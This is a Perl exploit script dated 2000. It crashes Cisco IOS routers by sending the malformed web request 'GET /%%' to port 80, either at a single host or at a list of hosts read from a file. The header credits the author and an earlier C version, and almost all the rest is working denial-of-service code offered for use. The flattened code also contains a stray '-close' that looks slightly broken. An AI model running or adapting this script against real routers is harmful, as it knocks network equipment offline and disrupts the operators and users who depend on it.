#!/usr/bin/perl ########################################################################## # Cisco IOS Router DOS attack via a specially formated web get request # # # # Coded by hypoclear of lUSt - (Linux Users Strike Today) on 5/23/00 # # # # Why did I make another exploit script for this vulnerability? # # Because I saw that it could be done in a few lines of PERL # # so why the heck not?!? The whole thing could have been done in # # about 10 - 15 lines of PERL, but I added things to make it cooler. # # Basically I wanted to show that certain things can be done in # # PERL much easier than in C. # # # # Shout out to vortexia at www.hack.co.za, who coded the original # # exploit in C. # # # # usage: ciscowebdos.pl -h <host> or ciscowebdos.pl -f <file> # # NOTE: file can store multiple hosts seperated on different lines # ########################################################################## use IO::Socket; use Getopt::Std; getopts('f:h:'); sub use_file{my $host; print "Using file: $opt_f\n\n"; open (HOSTLIST, "$opt_f") or die "can't open file: $!\n"; while (<HOSTLIST>){crash_host($_);} close (HOSTLIST) or die "couldn't close file: $!\n"} sub crash_host{ print "Crashing: $_[0]\n"; $remote = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$_[0], PeerPort=>"http(80)",); unless ($remote){die "Can't Connect...Try to crash something else\n\n"}; $remote->autoflush(1); print $remote "GET /\%\% HTTP/1.0\n\n"; -close $remote; print "All should now be crashed...\n\n";} print "\n\t\t\t***Lame props to myself*** \t\t\tCoded by hypoclear of lUSt \t\t\t(Linux Users Strike Today)\n\n"; if (defined $opt_f) {use_file();} elsif (defined $opt_h) {crash_host($opt_h);} else {print "Usage: ciscowebdos.pl -h <host> or ciscowebdos.pl -f <file>\n";}